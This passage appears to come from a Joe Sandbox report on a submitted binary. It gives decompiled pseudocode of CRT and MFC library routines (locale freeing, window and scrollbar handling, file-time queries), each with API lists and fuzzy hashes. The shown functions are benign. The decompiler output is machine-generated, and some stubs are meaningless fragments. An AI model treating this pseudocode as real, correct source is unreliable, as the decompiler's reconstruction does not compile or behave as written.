                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439156
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439163
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043917F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043918F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 004391A5
                  • ___freetlocinfo.LIBCMT ref: 00439205
                    • Part of subcall function 00438F3D: ___free_lconv_mon.LIBCMT ref: 00438F83
                    • Part of subcall function 00438F3D: ___free_lconv_num.LIBCMT ref: 00438FA4
                    • Part of subcall function 00438F3D: ___free_lc_time.LIBCMT ref: 00439029
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                  • String ID: P;F
                  • API String ID: 467427115-821099583
                  • Opcode ID: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction ID: 61ced1987d1eff592f3a7abbb9b964a4908a5711a4a26ed9b6d79d1087f2f2aa
                  • Opcode Fuzzy Hash: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction Fuzzy Hash: 05E04F32501D22358E3629196410AABB2942F8E719F1A299BF834A7359EBEC4C8080AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424340(void* __eax, void* __ebx, void* __edx, void* __edi) {
                  				void* _t5;
                  
                  				_t5 = __eax;
                  				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
                  			}





                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
                  • Opcode ID: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction ID: 41b635fbd72690f6c41e90ba14f5db02281b1f503569879f63f8d22cb9e6b9e6
                  • Opcode Fuzzy Hash: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction Fuzzy Hash: 75E086B27011245BC7206B6EFC8474AA26CEBC0361F57417BD94143261F3BD4840CEDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424341(void* __eax, void* __ebx, void* __edx, void* __edi) {
                  				void* _t5;
                  
                  				_t5 = __eax;
                  				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
                  			}





                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
                  • Opcode ID: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction ID: 362583a6ec685c06e829ffb7026d3f7272e8230db339484b57aec9b72c79060d
                  • Opcode Fuzzy Hash: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction Fuzzy Hash: 50E0CDE2B452251BC7206A6EFCC464E6A5CDFC036071745BBD881D3111F3AD9840C5DF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 40%
                  			E0041443A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
                  				signed int _v8;
                  				char _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				char _v284;
                  				intOrPtr _v288;
                  				RECT* _v292;
                  				struct tagRECT _v308;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t58;
                  				signed char _t65;
                  				signed int _t70;
                  				intOrPtr _t107;
                  				intOrPtr _t108;
                  				signed int _t113;
                  				signed int _t115;
                  				intOrPtr _t133;
                  				RECT* _t135;
                  				intOrPtr _t137;
                  				intOrPtr _t139;
                  				intOrPtr _t140;
                  				signed int _t145;
                  				void* _t146;
                  
                  				_t133 = __edx;
                  				_t109 = __ecx;
                  				_t143 = _t145;
                  				_t146 = _t145 - 0x130;
                  				_t58 =  *0x463404; // 0x18eab29f
                  				_v8 = _t58 ^ _t145;
                  				_t139 = _a4;
                  				_t135 = _a8;
                  				_t107 = __ecx;
                  				_v288 = _t139;
                  				_v292 = _t135;
                  				_t149 = __ecx;
                  				if(__ecx == 0) {
                  					L2:
                  					E00406436(_t107, _t109, _t135, _t139, _t149);
                  				}
                  				if(_t139 == 0) {
                  					goto L2;
                  				}
                  				_t62 = GetWindowRect( *(_t139 + 0x20),  &_v308);
                  				if( *((intOrPtr*)(_t139 + 0x90)) != _t107 || _t135 != 0 && EqualRect( &_v308, _t135) == 0) {
                  					if( *((intOrPtr*)(_t107 + 0x98)) != 0 && ( *(_t139 + 0x88) & 0x00000040) != 0) {
                  						 *(_t107 + 0x84) =  *(_t107 + 0x84) | 0x00000040;
                  					}
                  					 *(_t107 + 0x84) =  *(_t107 + 0x84) & 0xfffffff9;
                  					_t65 =  *(_t139 + 0x84) & 0x00000006 |  *(_t107 + 0x84);
                  					 *(_t107 + 0x84) = _t65;
                  					_t157 = _t65 & 0x00000040;
                  					if((_t65 & 0x00000040) == 0) {
                  						_push(0x104);
                  						_push( &_v268);
                  						E00412D87(_t107, _t139, _t133, _t135, _t139, _t157);
                  						E0041FC5A(_t139, _t133,  *((intOrPtr*)(_t107 + 0x20)),  &_v268);
                  					}
                  					_t70 = ( *(_t139 + 0x84) ^  *(_t107 + 0x84)) & 0x0000f000 ^  *(_t139 + 0x84) | 0x00000f00;
                  					if( *((intOrPtr*)(_t107 + 0x98)) == 0) {
                  						_t71 = _t70 & 0xfffffffe;
                  						__eflags = _t70 & 0xfffffffe;
                  					} else {
                  						_t71 = _t70 | 0x00000001;
                  					}
                  					E00420D66(_t139, _t71);
                  					_t136 = E004135F7(_t107, GetDlgCtrlID( *(_t139 + 0x20)), 0xffffffff);
                  					if(_t136 > 0) {
                  						 *((intOrPtr*)(E0040B917(_t107 + 0x9c, _t136))) = _t139;
                  					}
                  					if(_v292 == 0) {
                  						__eflags = _t136 - 1;
                  						if(_t136 < 1) {
                  							_t136 = _t107 + 0x9c;
                  							E004133A2(_t107 + 0x9c, _t139);
                  							E004133A2(_t107 + 0x9c, 0);
                  						}
                  						_t113 =  *0x466524; // 0x2
                  						_push(0x115);
                  						__eflags = 0;
                  						_push(0);
                  						_push(0);
                  						_push( ~_t113);
                  						_t115 =  *0x466520; // 0x2
                  						_push( ~_t115);
                  						_push(0);
                  					} else {
                  						E00413342( &_v284, _v292);
                  						E00422BFB(_t107,  &_v284);
                  						if(_t136 < 1) {
                  							asm("cdq");
                  							asm("cdq");
                  							_push((_v272 - _v280 - _t133 >> 1) + _v280);
                  							_push((_v276 - _v284 - _t133 >> 1) + _v284);
                  							_t136 = _t146 - 0x10;
                  							_push(_v288);
                  							asm("movsd");
                  							asm("movsd");
                  							asm("movsd");
                  							asm("movsd");
                  							E0041365C(_t107);
                  							_t139 = _v288;
                  						}
                  						_push(0x114);
                  						_push(_v272 - _v280);
                  						_push(_v276 - _v284);
                  						_push(_v280);
                  						_push(_v284);
                  						_push(0);
                  					}
                  					E00412D05(_t139);
                  					if(E0040EE3C(_t107, _t139, GetParent( *(_t139 + 0x20))) != _t107) {
                  						E004133D6(_t139, _t107);
                  					}
                  					_t118 =  *((intOrPtr*)(_t139 + 0x90));
                  					if( *((intOrPtr*)(_t139 + 0x90)) != 0) {
                  						E00413A2C(_t118, _t136, _t139, 0xffffffff, 0);
                  					}
                  					 *((intOrPtr*)(_t139 + 0x90)) = _t107;
                  					 *(E00408487(_t107) + 0xe4) =  *(_t62 + 0xe4) | 0x0000000c;
                  				}
                  				_pop(_t137);
                  				_pop(_t140);
                  				_pop(_t108);
                  				return E00430650(_t62, _t108, _v8 ^ _t143, _t133, _t137, _t140);
                  			}































                  APIs
                  • GetWindowRect.USER32 ref: 0041447D
                  • EqualRect.USER32 ref: 0041449B
                  • GetDlgCtrlID.USER32 ref: 00414540
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 00414658
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ParentRectWindow$CtrlEqualException@8H_prolog3Throw
                  • String ID:
                  • API String ID: 295898562-0
                  • Opcode ID: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction ID: ba48c219f6f1ad370f563cc23c44ecb0e53aac9f91ee0a06091b5b2abe8ce970
                  • Opcode Fuzzy Hash: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction Fuzzy Hash: 0F61D5716001199FCB24DF29CD42BEA77B5BF85304F0401AEEA5ED7291DF789E818B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E004482FB(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
                  				signed int _t52;
                  				void* _t54;
                  				void* _t58;
                  				intOrPtr _t61;
                  				signed int _t67;
                  				void* _t106;
                  				void* _t130;
                  
                  				_t123 = __edi;
                  				_t122 = __edx;
                  				_t95 = __ebx;
                  				_push(0x58);
                  				E00431B04(E0044CB8F, __ebx, __edi, __esi);
                  				_t129 = __ecx;
                  				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
                  					_t52 =  *(_t129 + 0x4c);
                  					__eflags = _t52;
                  					if(_t52 != 0) {
                  						__eflags =  *(_t129 + 0x3c);
                  						if(__eflags != 0) {
                  							E00447F37(_t130 - 0x2c);
                  							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
                  							while(1) {
                  								_push( *(_t129 + 0x4c));
                  								_t54 = E004499A8(_t95, _t122, _t123, _t129, __eflags);
                  								__eflags = _t54 - 0xffffffff;
                  								if(_t54 == 0xffffffff) {
                  									break;
                  								}
                  								E00448268(_t54, _t130 - 0x2c, _t122, _t129, 1, _t54);
                  								_t58 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x44));
                  								_t95 = _t58;
                  								_t61 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x64));
                  								_t122 =  *( *(_t129 + 0x3c));
                  								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
                  								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
                  								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
                  								__eflags = _t67;
                  								if(_t67 < 0) {
                  									break;
                  								} else {
                  									_t123 = 1;
                  									__eflags = _t67 - 1;
                  									if(_t67 <= 1) {
                  										_t106 = _t130 - 0x2c;
                  										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
                  										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
                  											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E0044794F(E0044818F(_t106, _t130 - 0x54));
                  											while(1) {
                  												__eflags = _t123;
                  												if(_t123 <= 0) {
                  													goto L23;
                  												}
                  												_push( *(_t129 + 0x4c));
                  												_t123 = _t123 - 1;
                  												__eflags = _t123;
                  												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
                  												E00442D62(_t95, _t122, _t123, _t129, _t123);
                  											}
                  											goto L23;
                  										} else {
                  											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c));
                  											E004020E0(_t130 - 0x2c, _t130, 0,  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c)));
                  											continue;
                  										}
                  									} else {
                  										__eflags = _t67 - 3;
                  										if(_t67 != 3) {
                  											break;
                  										} else {
                  											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
                  											if(__eflags < 0) {
                  												continue;
                  											} else {
                  												E0043065F(_t95, _t83, _t130 - 0x2d, 1, E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x4c)), 1);
                  												L23:
                  												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
                  											}
                  										}
                  									}
                  								}
                  								L19:
                  								E00402090(_t130 - 0x2c, _t130, 1, 0);
                  								goto L3;
                  							}
                  							__eflags = _t129;
                  							goto L19;
                  						} else {
                  							_t52 = E00447F77(__eflags, _t130 - 0x2d, _t52);
                  							__eflags = _t52;
                  							if(_t52 == 0) {
                  								goto L5;
                  							} else {
                  							}
                  						}
                  					} else {
                  						L5:
                  					}
                  				} else {
                  					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                  					_t129 =  *(__ecx + 0x20);
                  					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
                  				}
                  				L3:
                  				return E00431B87(_t95, _t123, _t129);
                  			}











                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00448302
                  • _fgetc.LIBCMT ref: 00448438
                    • Part of subcall function 00448268: std::_String_base::_Xlen.LIBCPMT ref: 0044827E
                  • _memcpy_s.LIBCMT ref: 004483FD
                  • _ungetc.LIBCMT ref: 00448483
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                  • String ID:
                  • API String ID: 9762108-0
                  • Opcode ID: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction ID: 6b1c3ca6e5d9ee48176232dde700f32502ceeb77f090096f39552806af3b4032
                  • Opcode Fuzzy Hash: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction Fuzzy Hash: 1351B1729046099FEB14EFB5C8529EEB3B9AF08314B50451FE452E7291EF38E905CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E0042E41C(void* __ebx, void* __ecx, void* __eflags, signed int* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				char _v20;
                  				struct _FILETIME _v28;
                  				struct _FILETIME _v36;
                  				char _v44;
                  				void* __edi;
                  				void* __esi;
                  				void* _t56;
                  				signed int* _t60;
                  				signed int* _t82;
                  				signed int* _t85;
                  				signed int* _t88;
                  				struct _FILETIME* _t94;
                  				void* _t106;
                  				CHAR* _t107;
                  				signed int* _t108;
                  				void* _t112;
                  
                  				_t91 = __ecx;
                  				_t108 = _a4;
                  				_t106 = __ecx;
                  				E00431160(__ecx, _t108, 0, 0x128);
                  				E004048ED(__ebx, _t91, _t106, _t108,  &(_t108[8]), 0x104,  *(_t106 + 0xc), 0xffffffff);
                  				_t56 =  *(_t106 + 4);
                  				_t112 = _t56 -  *0x4542f8; // 0xffffffff
                  				if(_t112 == 0) {
                  					L20:
                  					return 1;
                  				}
                  				_t94 =  &_v20;
                  				if(GetFileTime(_t56, _t94,  &_v28,  &_v36) != 0) {
                  					_t60 =  &_v12;
                  					__imp__GetFileSizeEx( *(_t106 + 4), _t60);
                  					if(_t60 == 0) {
                  						goto L2;
                  					}
                  					_t108[6] = _v12;
                  					_t108[7] = _v8;
                  					_t107 =  *(_t106 + 0xc);
                  					if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
                  						_t108[8] = (_t94 & 0xffffff00 | GetFileAttributesA(_t107) == 0xffffffff) - 0x00000001 & _t64;
                  					} else {
                  						_t108[8] = 0;
                  					}
                  					if(E0042DF81( &_v20) == 0) {
                  						 *_t108 =  *_t108 & 0x00000000;
                  						_t108[1] = _t108[1] & 0x00000000;
                  					} else {
                  						_t88 = E0042E0A4( &_v44,  &_v20, 0xffffffff);
                  						 *_t108 =  *_t88;
                  						_t108[1] = _t88[1];
                  					}
                  					if(E0042DF81( &_v28) == 0) {
                  						_t108[4] = 0;
                  						_t108[5] = 0;
                  					} else {
                  						_t85 = E0042E0A4( &_v44,  &_v28, 0xffffffff);
                  						_t108[4] =  *_t85;
                  						_t108[5] = _t85[1];
                  					}
                  					if(E0042DF81( &_v36) == 0) {
                  						_t108[2] = 0;
                  						_t108[3] = 0;
                  					} else {
                  						_t82 = E0042E0A4( &_v44,  &_v36, 0xffffffff);
                  						_t108[2] =  *_t82;
                  						_t108[3] = _t82[1];
                  					}
                  					if(( *_t108 | _t108[1]) == 0) {
                  						 *_t108 = _t108[2];
                  						_t108[1] = _t108[3];
                  					}
                  					if((_t108[4] | _t108[5]) == 0) {
                  						_t108[4] = _t108[2];
                  						_t108[5] = _t108[3];
                  					}
                  					goto L20;
                  				}
                  				L2:
                  				return 0;
                  			}






















                  APIs
                  • _memset.LIBCMT ref: 0042E433
                    • Part of subcall function 004048ED: __cftof.LIBCMT ref: 004048FE
                  • GetFileTime.KERNEL32(?,?,?,?), ref: 0042E46A
                  • GetFileSizeEx.KERNEL32(?,?), ref: 0042E482
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: File$SizeTime__cftof_memset
                  • String ID:
                  • API String ID: 2749391713-0
                  • Opcode ID: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction ID: 59e65bddb89cb08a79970d6891d001c7148b8aeecaf6f385f6588ba968201997
                  • Opcode Fuzzy Hash: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction Fuzzy Hash: 5D517071A00615AFCB20DF66D840D9BB7F4BF08324B448A2EE5A6D3690E734E545CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0041C15A(void* __ecx, int _a4, int _a8, int _a12) {
                  				intOrPtr _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				intOrPtr _t62;
                  				intOrPtr _t63;
                  				intOrPtr* _t71;
                  				intOrPtr _t78;
                  				intOrPtr* _t81;
                  				signed short _t100;
                  				void* _t109;
                  				signed int _t112;
                  				int* _t113;
                  				void* _t117;
                  
                  				_t117 = __ecx;
                  				_push(0);
                  				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
                  					_t62 =  *((intOrPtr*)(__ecx + 0xb0));
                  					_t112 = _a4 * 0x28;
                  					 *(__ecx + 0x118) = 1;
                  					 *((intOrPtr*)(_t62 + 0x20)) =  *((intOrPtr*)(_t62 + _t112 + 0x20));
                  					 *((intOrPtr*)(_t62 + 0x24)) =  *((intOrPtr*)(_t62 + _t112 + 0x24));
                  					_t63 =  *((intOrPtr*)(__ecx + 0xb0));
                  					 *((intOrPtr*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + _t112 + 0x10));
                  					 *((intOrPtr*)(_t63 + 0x14)) =  *((intOrPtr*)(_t63 + _t112 + 0x14));
                  					_push( *((intOrPtr*)(__ecx + 0x114)) + _a4);
                  					E0041BAC8(__ecx);
                  					E0041B7FA(__ecx, __eflags, 0);
                  					_t113 = _t112 +  *((intOrPtr*)(_t117 + 0xb0)) + 0x18;
                  					_a8 = MulDiv(_a8,  *_t113, _t113[1]);
                  					_a12 = MulDiv(_a12,  *_t113, _t113[1]);
                  					_t71 =  *((intOrPtr*)(_t117 + 0xb0));
                  					_a12 = _a12 +  *((intOrPtr*)(_t71 + 4));
                  					_t59 =  &_a8;
                  					 *_t59 = _a8 +  *_t71;
                  					__eflags =  *_t59;
                  					return E004195B7(_t117, _t109, _a8, _a12);
                  				}
                  				 *(__ecx + 0x118) =  *(__ecx + 0x108);
                  				ShowScrollBar( *(__ecx + 0x20), 0, ??);
                  				_t78 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x134)))) + 0x74));
                  				_t100 =  *(_t78 + 0x1e) & 0x0000ffff;
                  				if(_t100 >= 0x8000) {
                  					L3:
                  					_a4 = 0;
                  					L4:
                  					ShowScrollBar( *(_t117 + 0x20), 1, _a4);
                  					if(_a4 != 0) {
                  						_t81 =  *((intOrPtr*)(_t117 + 0x134));
                  						_v28 = 3;
                  						_v24 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1c) & 0x0000ffff;
                  						_v20 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1e) & 0x0000ffff;
                  						_v16 = 1;
                  						if(E0040CE62(_t117, 1,  &_v32, 0) == 0) {
                  							E0040DAD4(_t117, 1, _v24, _v20, 0);
                  						}
                  					}
                  					return E0041BAC8(_t117,  *((intOrPtr*)(_t117 + 0x114)), 1);
                  				}
                  				_a4 = 1;
                  				if((_t100 & 0x0000ffff) - ( *(_t78 + 0x1c) & 0x0000ffff) <= 0x7fff) {
                  					goto L4;
                  				}
                  				goto L3;
                  			}



















                  APIs
                  • ShowScrollBar.USER32(?,00000000,00000000), ref: 0041C18C
                  • ShowScrollBar.USER32(?,00000001,?), ref: 0041C1CA
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C299
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C2A6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ScrollShow
                  • String ID:
                  • API String ID: 3611344627-0
                  • Opcode ID: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction ID: bf8b80c232955c01bad76bb884e3b34b9d27a71a0442df1df84a360057f59a7a
                  • Opcode Fuzzy Hash: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction Fuzzy Hash: CF416674600604AFCB15DF69C880AAABBF6FF48304F00456EF85A9B361D774E990DF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004425DA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				char _v8;
                  				signed int _v12;
                  				char _v20;
                  				char _t43;
                  				char _t46;
                  				signed int _t53;
                  				signed int _t54;
                  				intOrPtr _t56;
                  				int _t57;
                  				int _t58;
                  				signed short* _t59;
                  				short* _t60;
                  				int _t65;
                  				char* _t73;
                  
                  				_t73 = _a8;
                  				if(_t73 == 0 || _a12 == 0) {
                  					L5:
                  					return 0;
                  				} else {
                  					if( *_t73 != 0) {
                  						E00430D81( &_v20, __edi, _a16);
                  						_t43 = _v20;
                  						__eflags =  *(_t43 + 0x14);
                  						if( *(_t43 + 0x14) != 0) {
                  							_t46 = E004403C3( *_t73 & 0x000000ff,  &_v20);
                  							__eflags = _t46;
                  							if(_t46 == 0) {
                  								__eflags = _a4;
                  								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                  								if(__eflags != 0) {
                  									L10:
                  									__eflags = _v8;
                  									if(_v8 != 0) {
                  										_t53 = _v12;
                  										_t11 = _t53 + 0x70;
                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                  										__eflags =  *_t11;
                  									}
                  									return 1;
                  								}
                  								L21:
                  								_t54 = E00431D3E(__eflags);
                  								 *_t54 = 0x2a;
                  								__eflags = _v8;
                  								if(_v8 != 0) {
                  									_t54 = _v12;
                  									_t33 = _t54 + 0x70;
                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                  									__eflags =  *_t33;
                  								}
                  								return _t54 | 0xffffffff;
                  							}
                  							_t56 = _v20;
                  							_t65 =  *(_t56 + 0xac);
                  							__eflags = _t65 - 1;
                  							if(_t65 <= 1) {
                  								L17:
                  								__eflags = _a12 -  *(_t56 + 0xac);
                  								if(__eflags < 0) {
                  									goto L21;
                  								}
                  								__eflags = _t73[1];
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								L19:
                  								_t57 =  *(_t56 + 0xac);
                  								__eflags = _v8;
                  								if(_v8 == 0) {
                  									return _t57;
                  								}
                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                  								return _t57;
                  							}
                  							__eflags = _a12 - _t65;
                  							if(_a12 < _t65) {
                  								goto L17;
                  							}
                  							__eflags = _a4;
                  							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                  							__eflags = _t58;
                  							_t56 = _v20;
                  							if(_t58 != 0) {
                  								goto L19;
                  							}
                  							goto L17;
                  						}
                  						_t59 = _a4;
                  						__eflags = _t59;
                  						if(_t59 != 0) {
                  							 *_t59 =  *_t73 & 0x000000ff;
                  						}
                  						goto L10;
                  					} else {
                  						_t60 = _a4;
                  						if(_t60 != 0) {
                  							 *_t60 = 0;
                  						}
                  						goto L5;
                  					}
                  				}
                  			}


















                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044260E
                  • __isleadbyte_l.LIBCMT ref: 00442642
